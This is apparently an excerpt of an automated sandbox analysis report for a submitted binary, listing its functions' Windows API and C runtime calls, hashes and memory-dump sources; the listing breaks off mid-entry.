                            • Instruction ID: 558e8ee949eb26214d754a8ca766e9a474407e0f60b489d30eb93966a73d8c97
                            • Opcode Fuzzy Hash: 21a41faa657c65ac93ba75a52e9452e2029987aa5e6fd2a58fa264d5f4c40d24
                            • Instruction Fuzzy Hash: E011E53A2007059FDB189F79E8916BBB7E1FF8436CB15442CE98697A41D771B942C740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 01339221: GetLastError.KERNEL32(?,00000000,01333664,?,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?), ref: 01339225
                              • Part of subcall function 01339221: SetLastError.KERNEL32(00000000,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?,?,01336731,013552B8), ref: 013392C7
                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0134251D,00000000,00000000,?), ref: 013427AF
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$InfoLocale
                            • String ID:
                            • API String ID: 3736152602-0
                            • Opcode ID: fe1ae13ef9670a7ca025d53cebdd0e4fb9e2944d354e50c628e5943c8c9c0f30
                            • Instruction ID: a102f504e5f869f281c8215efc5d9465e4c9024a365dd37e8f635ea48d753547
                            • Opcode Fuzzy Hash: fe1ae13ef9670a7ca025d53cebdd0e4fb9e2944d354e50c628e5943c8c9c0f30
                            • Instruction Fuzzy Hash: 13F0A436610116BBEB289A69EC45BBB7FA8FB4075CF054429FD06B3181EB74F941C6B0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 01339221: GetLastError.KERNEL32(?,00000000,01333664,?,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?), ref: 01339225
                              • Part of subcall function 01339221: SetLastError.KERNEL32(00000000,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?,?,01336731,013552B8), ref: 013392C7
                            • EnumSystemLocalesW.KERNEL32(01342554,00000001,?,?,-00000050,?,013428F6,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 013422C0
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$EnumLocalesSystem
                            • String ID:
                            • API String ID: 2417226690-0
                            • Opcode ID: f4da8ca9b8c54753130d739b781f8eb9a11676022c523bbf18abe29c5cb9dd09
                            • Instruction ID: d252c69d5ec6483ec05760363f244ffc81ac612aebccf53fa1d9ec8b968f14d3
                            • Opcode Fuzzy Hash: f4da8ca9b8c54753130d739b781f8eb9a11676022c523bbf18abe29c5cb9dd09
                            • Instruction Fuzzy Hash: 90F0F6363003095FDB249F7DA880A7B7BD5EF8036CF05446CF9459B640C6B1B942CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 013310BF: EnterCriticalSection.KERNEL32(-0145A9F0,?,01336724,?,013552B8,0000000C,013369EF,?), ref: 013310CE
                            • EnumSystemLocalesW.KERNEL32(013373B9,00000001,01355318,0000000C,013377E8,00000000), ref: 013373FE
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalEnterEnumLocalesSectionSystem
                            • String ID:
                            • API String ID: 1272433827-0
                            • Opcode ID: c9b79e3d54c9865aeb2639d5745d8b7d9e236b06ec693be14468df4a58ff8c2d
                            • Instruction ID: af50e00a453c2c354c31a71a308579719905dce14e6fc5167549cfcc828b9583
                            • Opcode Fuzzy Hash: c9b79e3d54c9865aeb2639d5745d8b7d9e236b06ec693be14468df4a58ff8c2d
                            • Instruction Fuzzy Hash: CAF04972A00302DFD720EF9CE442B9D7BF0EB84729F10812AE815DB390CB7599459B95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 01339221: GetLastError.KERNEL32(?,00000000,01333664,?,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?), ref: 01339225
                              • Part of subcall function 01339221: SetLastError.KERNEL32(00000000,?,00000000,?,00000003,0132F44B,?,?,?,?,00000000,?,?,?,01336731,013552B8), ref: 013392C7
                            • EnumSystemLocalesW.KERNEL32(013420E9,00000001,?,?,?,01342954,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 013421C7
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$EnumLocalesSystem
                            • String ID:
                            • API String ID: 2417226690-0
                            • Opcode ID: c3a4e7e90b22a1ca1fc5988f8cee244d9ad2d15c74a9e77f1a277e5a78a7a9a7
                            • Instruction ID: 8a246561555a5990b368311ec1b5049478ed15bbef3e592b671440e08906bc57
                            • Opcode Fuzzy Hash: c3a4e7e90b22a1ca1fc5988f8cee244d9ad2d15c74a9e77f1a277e5a78a7a9a7
                            • Instruction Fuzzy Hash: 34F0E53A300249A7CB15AF7AEC45B6B7FD4EFC1728B064099FF099B641C671A882C750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0133626D,?,20001004,00000000,00000002,?,?,0133586F), ref: 01337920
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoLocale
                            • String ID:
                            • API String ID: 2299586839-0
                            • Opcode ID: f02cf184543d396b1ab0a4ca5a949aa9430517199d09e6f93b8933d2ccc7a022
                            • Instruction ID: 7d2401bdd4fbcff0e94457495f3339b74950622c42da3845006e09b290054aa9
                            • Opcode Fuzzy Hash: f02cf184543d396b1ab0a4ca5a949aa9430517199d09e6f93b8933d2ccc7a022
                            • Instruction Fuzzy Hash: 53E0867550011DBBDF222FA4DC04F9E7F19EF847A4F018111FD0566621CB3199319BD8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: HeapProcess
                            • String ID:
                            • API String ID: 54951025-0
                            • Opcode ID: 88449d01877c7658624bfb512ef89c6faaaff7456f128cc9350bbfe740ef04dc
                            • Instruction ID: a93ed687167abb637c291c54605a62e7995323041086b646c768eaadf4f354b4
                            • Opcode Fuzzy Hash: 88449d01877c7658624bfb512ef89c6faaaff7456f128cc9350bbfe740ef04dc
                            • Instruction Fuzzy Hash: A0A0247C101300CFC3504F31530430D35DDFF057C07044055D100C4114DF30C0004700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d0e2944bcce131199e752fe203d5283bfd464a3bd7f21dd2a3c776765c2e216c
                            • Instruction ID: ad013c57e245d6cccb8cf71f7543a29d031c962ac278acaae40135a4f2f44acd
                            • Opcode Fuzzy Hash: d0e2944bcce131199e752fe203d5283bfd464a3bd7f21dd2a3c776765c2e216c
                            • Instruction Fuzzy Hash: 0E320421D29F014ED7339538C862335A64DAFB73D8F15D737E81AB5A9AEF29D4834204
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                            • String ID:
                            • API String ID: 3471368781-0
                            • Opcode ID: 2cee698dafcdaf8c3ea87d44df52a42072c243241330c1a77fbf746219897567
                            • Instruction ID: 9731f1d18641f3506ef7f3bf384d667ed49d063e180a7bbab10ac0b94c1f5398
                            • Opcode Fuzzy Hash: 2cee698dafcdaf8c3ea87d44df52a42072c243241330c1a77fbf746219897567
                            • Instruction Fuzzy Hash: 3FB1E175600B069BDB38AB28CC81BB7B3E9EB4430CF44452DEA8786591FA74B985CB14
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 013253BC
                            • std::_Lockit::_Lockit.LIBCPMT ref: 013253D9
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 013253FD
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 01325428
                            • std::_Lockit::_Lockit.LIBCPMT ref: 0132549A
                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 013254EF
                            • __Getctype.LIBCPMT ref: 01325506
                            • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 01325546
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 013255E8
                            • std::_Facet_Register.LIBCPMT ref: 013255EE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_GetctypeLocinfo_ctorLocinfo_dtorRegister
                            • String ID: bad locale name
                            • API String ID: 103145292-1405518554
                            • Opcode ID: 941e45479cce8ee024d912b1912dd1fefaa11ef9029572c433b622537b0eb88b
                            • Instruction ID: 88425e00828df31f0c8874be78ad7a8be4d4a2bc9784a768fbd13695611702c1
                            • Opcode Fuzzy Hash: 941e45479cce8ee024d912b1912dd1fefaa11ef9029572c433b622537b0eb88b
                            • Instruction Fuzzy Hash: FD61B5B19043618FE721EF28D480B5BB7E4FF9471CF14495DE989A7212EB34E648CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 013259CC
                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 01325A21
                            • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 01325B99
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 01325C3B
                            • Concurrency::cancel_current_task.LIBCPMT ref: 01325C63
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Locinfo::_Lockit$Concurrency::cancel_current_taskLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                            • String ID: ,$.$bad locale name$false$true
                            • API String ID: 3204333896-3659324578
                            • Opcode ID: 29cce177f64b504992a7d162b8ad457ab570de62892f9527edb9df03b1ee0040
                            • Instruction ID: 99917375f485097b9167d32416566c77d3ae7c8786609517479c7ca3ce294112
                            • Opcode Fuzzy Hash: 29cce177f64b504992a7d162b8ad457ab570de62892f9527edb9df03b1ee0040
                            • Instruction Fuzzy Hash: 268186B19083959FE720EF28C941B9BB7E4AF95708F044A1DF98997240F774E248CB53
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 01324E90
                            • std::_Lockit::_Lockit.LIBCPMT ref: 01324EAA
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 01324ECB
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 01324EF3
                            • std::_Lockit::_Lockit.LIBCPMT ref: 01324F5F
                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 01324FB4
                            • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 01324FCB
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0132506D
                            • std::_Facet_Register.LIBCPMT ref: 01325073
                              • Part of subcall function 013267D7: std::invalid_argument::invalid_argument.LIBCONCRT ref: 013267E3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegisterstd::invalid_argument::invalid_argument
                            • String ID: bad locale name
                            • API String ID: 1592514138-1405518554
                            • Opcode ID: c02cdb69f3717e6e51e8919d8fe21bb4cb7085a3ade6d27804d401c11962b5b0
                            • Instruction ID: a002eed4ef12f72d6b1256d057bce9bc13db0bc2782d67550809caf422f2919b
                            • Opcode Fuzzy Hash: c02cdb69f3717e6e51e8919d8fe21bb4cb7085a3ade6d27804d401c11962b5b0
                            • Instruction Fuzzy Hash: 6D51B2B15083519FEB20EF28D884B1BBBE4AF94758F04485DF98997351E734E908CBA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • type_info::operator==.LIBVCRUNTIME ref: 0132D2C7
                            • ___TypeMatch.LIBVCRUNTIME ref: 0132D3D5
                            • _UnwindNestedFrames.LIBCMT ref: 0132D527
                            • CallUnexpected.LIBVCRUNTIME ref: 0132D542
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                            • String ID: csm$csm$csm
                            • API String ID: 2751267872-393685449
                            • Opcode ID: d12dcda419923d74f45e4a739b48c648371c7deee169dd3d8437457bb5aa4226
                            • Instruction ID: bbefc403a119a300d18629bea6b237a53bda97a7430d91c8fa21db6559e2f5f1
                            • Opcode Fuzzy Hash: d12dcda419923d74f45e4a739b48c648371c7deee169dd3d8437457bb5aa4226
                            • Instruction Fuzzy Hash: BFB1AE71C0022AEFDF25EFE8D8809AEBBB5FF15318F14415AE9046B212D770EA51CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetCPInfo.KERNEL32(0166EEF8,0166EEF8,?,7FFFFFFF,?,01346B4A,0166EEF8,0166EEF8,?,0166EEF8,?,?,?,?,0166EEF8,?), ref: 01346920
                            • __alloca_probe_16.LIBCMT ref: 013469DB
                            • __alloca_probe_16.LIBCMT ref: 01346A6A
                            • __freea.LIBCMT ref: 01346AB5
                            • __freea.LIBCMT ref: 01346ABB
                            • __freea.LIBCMT ref: 01346AF1
                            • __freea.LIBCMT ref: 01346AF7
                            • __freea.LIBCMT ref: 01346B07
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: __freea$__alloca_probe_16$Info
                            • String ID:
                            • API String ID: 127012223-0
                            • Opcode ID: 10972dd37d57e76a59c72f9e4713a1df02d3fa9fc7a3b184e63b6e823df9f251
                            • Instruction ID: da7e50aaedbe76f01bdc69b89c3f0fd30693e53fb730ce99478a8de8c5ea0cc0
                            • Opcode Fuzzy Hash: 10972dd37d57e76a59c72f9e4713a1df02d3fa9fc7a3b184e63b6e823df9f251
                            • Instruction Fuzzy Hash: 7D71E5F2A0461AABEF219F5D8C42FEE7BF99F4631CF190059E904A7281D775E804C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0132986B
                            • __alloca_probe_16.LIBCMT ref: 01329897
                            • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 013298D6
                            • LCMapStringEx.KERNEL32 ref: 013298F3
                            • LCMapStringEx.KERNEL32 ref: 01329932
                            • __alloca_probe_16.LIBCMT ref: 0132994F
                            • LCMapStringEx.KERNEL32 ref: 01329991
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 013299B4
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiStringWide$__alloca_probe_16
                            • String ID:
                            • API String ID: 2040435927-0
                            • Opcode ID: 153ac4858f24eeec8c5aeacd2a704e590c57cc9fc404675363726395fffa8ec8
                            • Instruction ID: 4ad202d13749c576ee2e6d8734302cd70cdbf16ecab2f8df86c5decaa8e0385e
                            • Opcode Fuzzy Hash: 153ac4858f24eeec8c5aeacd2a704e590c57cc9fc404675363726395fffa8ec8
                            • Instruction Fuzzy Hash: EB519F7260023BABEF206FA8CC44FAF7FA9EF5476CF154425FA15A6150DB759810CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetLastError.KERNEL32(?,?,0132CE31,0132AAC8,0132A707), ref: 0132CE48
                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0132CE56
                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0132CE6F
                            • SetLastError.KERNEL32(00000000,0132CE31,0132AAC8,0132A707), ref: 0132CEC1
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastValue___vcrt_
                            • String ID:
                            • API String ID: 3852720340-0
                            • Opcode ID: d4a7a5671212be1ecf9127304336e66c82925b532944729db89550dda1ba7540
                            • Instruction ID: 9a24d4ef6a85d08021b75cfd260309606f3efde60cce20aa7554ffd3d6b2a1a2
                            • Opcode Fuzzy Hash: d4a7a5671212be1ecf9127304336e66c82925b532944729db89550dda1ba7540
                            • Instruction Fuzzy Hash: B301D47210D7326FE73536BDBC8666F2A5CEB1177EB20123AE128561E0EF6948019284
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,51F7B458,?,?,00000000,01347A3A,000000FF,?,01334D77,01334EA7,?,01334D4B,00000000), ref: 01334E1C
                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01334E2E
                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,01347A3A,000000FF,?,01334D77,01334EA7,?,01334D4B,00000000), ref: 01334E50
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: 1aec9ac076efe8edc899d953d0403419496c684b90549594258ef54732c96e69
                            • Instruction ID: bf217fa0080ba38955451211836a91c2d7e1c6235cb3d7e1c17c026a32f979ad
                            • Opcode Fuzzy Hash: 1aec9ac076efe8edc899d953d0403419496c684b90549594258ef54732c96e69
                            • Instruction Fuzzy Hash: 9001A235914655AFEB228F95DC05BAFBBBCFB44B18F000529F915A2384DB74A900CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __alloca_probe_16.LIBCMT ref: 0133D28C
                            • __alloca_probe_16.LIBCMT ref: 0133D34D
                            • __freea.LIBCMT ref: 0133D3B4
                              • Part of subcall function 01337E20: RtlAllocateHeap.NTDLL(00000000,00000000,013369EF,?,0133D85F,?,00000000,?,01342A90,00000000,013369EF,00000000,?,?,?,013367E9), ref: 01337E52
                            • __freea.LIBCMT ref: 0133D3C9
                            • __freea.LIBCMT ref: 0133D3D9
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: __freea$__alloca_probe_16$AllocateHeap
                            • String ID:
                            • API String ID: 1423051803-0
                            • Opcode ID: 53b8328d80e573be49594a4f3470532241a10424b3bd5513a1f81801cf6899ff
                            • Instruction ID: a9ec041a7ec74b887f1a08af2d9f1dd82a1cacee2a0916bab4a4bdcea35b0c78
                            • Opcode Fuzzy Hash: 53b8328d80e573be49594a4f3470532241a10424b3bd5513a1f81801cf6899ff
                            • Instruction Fuzzy Hash: 0151937260021BAFEF255FE8DC81EBF7AA9EF94628B550129FD04D7150E770CD108768
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 01325150
                            • std::_Lockit::_Lockit.LIBCPMT ref: 0132516E
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0132518F
                            • std::_Facet_Register.LIBCPMT ref: 013251F4
